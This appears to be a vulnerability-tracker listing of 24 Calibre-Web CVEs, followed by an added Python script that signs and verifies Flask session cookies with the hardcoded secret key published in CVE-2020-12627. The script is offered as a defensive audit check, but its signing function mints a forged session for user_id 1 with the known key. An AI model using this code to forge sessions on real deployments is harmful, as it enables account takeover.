
janeczku calibre web

24 known vulnerabilities across versions
Each entry gives the affected version range, the CVSS score and severity, and the opening of the advisory text. An entry marked "all versions" has no version range recorded in this listing; the version named in its own description is the better guide (for example, CVE-2022-30765 is described as affecting Calibre-Web before 0.6.18).
CVE-2025-65858 | all versions | CVSS 3.5 LOW
A Stored Cross-Site Scripting (XSS) vulnerability in Calibre-Web v0.6.25 allows attackers to inject malicious JavaScript into the

CVE-2025-7404 | all versions | CVSS 9.8 CRITICAL
Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability in Calibre Web, Autocaliw

CVE-2021-3988 | < 0.6.15 | CVSS 6.1 MEDIUM
A Cross-site Scripting (XSS) vulnerability exists in janeczku/calibre-web, specifically in the file edit_books.js. The vulnerabi

CVE-2021-3987 | < 0.6.15 | CVSS 4.3 MEDIUM
An improper access control vulnerability exists in janeczku/calibre-web. The affected version allows users without public shelf pe

CVE-2021-3986 | < 0.6.15 | CVSS 4.3 MEDIUM
A vulnerability in janeczku/calibre-web allows unauthorized users to view the names of private shelves belonging to other users. T

CVE-2024-39123 | >= 0.6.0 and <= 0.6.21 | CVSS 5.4 MEDIUM
In janeczku Calibre-Web 0.6.0 to 0.6.21, the edit_book_comments function is vulnerable to Cross Site Scripting (XSS) due to improp

CVE-2023-2106 | < 0.6.20 | CVSS 9.8 CRITICAL
Weak Password Requirements in GitHub repository janeczku/calibre-web prior to 0.6.20.

CVE-2022-2525 | < 0.6.20 | CVSS 9.8 CRITICAL
Improper Restriction of Excessive Authentication Attempts in GitHub repository janeczku/calibre-web prior to 0.6.20.

CVE-2022-30765 | all versions | CVSS 9.8 CRITICAL
Calibre-Web before 0.6.18 allows user table SQL Injection.

CVE-2022-0990 | < 0.6.18 | CVSS 9.1 CRITICAL
Server-Side Request Forgery (SSRF) in GitHub repository janeczku/calibre-web prior to 0.6.18.

CVE-2022-0939 | < 0.6.18 | CVSS 9.9 CRITICAL
Server-Side Request Forgery (SSRF) in GitHub repository janeczku/calibre-web prior to 0.6.18.

CVE-2022-0406 | < 0.6.16 | CVSS 4.3 MEDIUM
Improper Authorization in GitHub repository janeczku/calibre-web prior to 0.6.16.

CVE-2022-0405 | < 0.6.16 | CVSS 4.3 MEDIUM
Improper Access Control in GitHub repository janeczku/calibre-web prior to 0.6.16.

CVE-2022-0767 | < 0.6.17 | CVSS 9.9 CRITICAL
Server-Side Request Forgery (SSRF) in GitHub repository janeczku/calibre-web prior to 0.6.17.

CVE-2022-0766 | < 0.6.17 | CVSS 9.8 CRITICAL
Server-Side Request Forgery (SSRF) in GitHub repository janeczku/calibre-web prior to 0.6.17.

CVE-2022-0339 | < 0.6.16 | CVSS 9.8 CRITICAL
Server-Side Request Forgery (SSRF) in Pypi calibreweb prior to 0.6.16.

CVE-2022-0273 | < 0.6.16 | CVSS 6.5 MEDIUM
Improper Access Control in Pypi calibreweb prior to 0.6.16.

CVE-2022-0352 | < 0.6.16 | CVSS 6.1 MEDIUM
Cross-site Scripting (XSS) - Reflected in Pypi calibreweb prior to 0.6.16.

CVE-2021-4164 | < 0.6.15 | CVSS 8.8 HIGH
calibre-web is vulnerable to Cross-Site Request Forgery (CSRF)

CVE-2021-4171 | < 0.6.15 | CVSS 9.8 CRITICAL
calibre-web is vulnerable to Business Logic Errors

CVE-2021-4170 | < 0.6.15 | CVSS 5.4 MEDIUM
calibre-web is vulnerable to Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

CVE-2021-25965 | >= 0.6.0 and <= 0.6.13 | CVSS 8.8 HIGH
In Calibre-web, versions 0.6.0 to 0.6.13 are vulnerable to Cross-Site Request Forgery (CSRF). By luring an authenticated user to c

CVE-2021-25964 | >= 0.6.0 and < 0.6.12 | CVSS 5.4 MEDIUM
In "Calibre-web" application, v0.6.0 to v0.6.12, are vulnerable to Stored XSS in "Metadata". An attacker that has access t

CVE-2020-12627 | all versions | CVSS 9.8 CRITICAL
Calibre-Web 0.6.6 allows authentication bypass because of the 'A0Zr98j/3yX R~XHH!jmN]LWX/,?RT' hardcoded secret key.
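Why a published secret key is an authentication bypass, and how to check a deployment for it: Flask signs its session cookie with HMAC derived from SECRET_KEY, so anyone holding the key from CVE-2020-12627 can mint a cookie the server accepts, and a defender can test a captured cookie from their own instance against that key. The script below is an added example, not code from this page or from Calibre-Web. It re-implements Flask's default SecureCookieSessionInterface scheme (itsdangerous URLSafeTimedSerializer, salt "cookie-session", HMAC-SHA1, key_derivation="hmac") with the standard library only, so it runs offline. It assumes plain-JSON session payloads and itsdangerous 2.x timestamps (seconds since the Unix epoch); the sample session dict is constructed for the demo.

```python
"""Check whether a Flask session cookie was signed with a given SECRET_KEY.

Added example (not Calibre-Web code). Reimplements Flask's default signed-cookie
session format in the standard library: payload.timestamp.signature, all
URL-safe base64 without padding, signature = HMAC-SHA1(derived_key, payload.timestamp),
derived_key = HMAC-SHA1(SECRET_KEY, b"cookie-session").
"""
import base64
import hashlib
import hmac
import json
import time
import zlib
from typing import Optional

# The secret key quoted in CVE-2020-12627 on this page.
HARDCODED_SECRET_KEY = "A0Zr98j/3yX R~XHH!jmN]LWX/,?RT"
SALT = b"cookie-session"  # Flask's fixed salt for session cookies


def _b64e(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def _b64d(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def derive_key(secret_key: str) -> bytes:
    # key_derivation="hmac": HMAC-SHA1 over the salt, keyed with SECRET_KEY
    return hmac.new(secret_key.encode("utf-8"), SALT, hashlib.sha1).digest()


def sign_session(session: dict, secret_key: str, timestamp: Optional[int] = None) -> str:
    """Mint a session cookie for `session` the way Flask would under `secret_key`."""
    raw = json.dumps(session, separators=(",", ":"), sort_keys=True).encode("utf-8")
    compressed = zlib.compress(raw)
    if len(compressed) < len(raw) - 1:      # itsdangerous compresses only when it pays off
        payload = "." + _b64e(compressed)    # a leading "." marks a compressed payload
    else:
        payload = _b64e(raw)
    ts = int(time.time()) if timestamp is None else timestamp
    ts_bytes = ts.to_bytes(max(1, (ts.bit_length() + 7) // 8), "big")
    value = f"{payload}.{_b64e(ts_bytes)}"
    sig = hmac.new(derive_key(secret_key), value.encode("ascii"), hashlib.sha1).digest()
    return f"{value}.{_b64e(sig)}"


def verify_session(cookie: str, secret_key: str, max_age: Optional[int] = None,
                   now: Optional[int] = None) -> Optional[dict]:
    """Return the session dict if `cookie` verifies under `secret_key`, else None."""
    try:
        value, sig_b64 = cookie.rsplit(".", 1)
        payload, ts_b64 = value.rsplit(".", 1)
        sig = _b64d(sig_b64)
        ts = int.from_bytes(_b64d(ts_b64), "big")
    except (ValueError, TypeError):
        return None
    expected = hmac.new(derive_key(secret_key), value.encode("ascii"), hashlib.sha1).digest()
    if not hmac.compare_digest(expected, sig):   # constant-time comparison
        return None
    current = int(time.time()) if now is None else now
    if max_age is not None and current - ts > max_age:
        return None
    try:
        body = payload[1:] if payload.startswith(".") else payload
        raw = _b64d(body)
        if payload.startswith("."):
            raw = zlib.decompress(raw)
        return json.loads(raw)
    except (ValueError, zlib.error):
        return None


def signed_with_known_key(cookie: str) -> bool:
    """True if a captured session cookie validates under the CVE-2020-12627 key."""
    return verify_session(cookie, HARDCODED_SECRET_KEY) is not None


if __name__ == "__main__":
    # Constructed sample session; not a real Calibre-Web cookie.
    demo = sign_session({"user_id": 1}, HARDCODED_SECRET_KEY)
    print(demo)
    print("signed with the hardcoded key:", signed_with_known_key(demo))
    print("verifies under a fresh key:", verify_session(demo, "fresh-random-key") is not None)
```

To audit a running instance, log in, copy the `session` cookie value and pass it to `signed_with_known_key`; a `True` result means the deployment still runs with the published key and every session can be forged. Two caveats: Flask validates a session as any JSON the server can load, so the exact session fields are irrelevant to the signature check, and deployments on itsdangerous 1.x encode the timestamp relative to a 2011 epoch, which only affects the `max_age` check, not whether the signature matches.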
threatengine.sh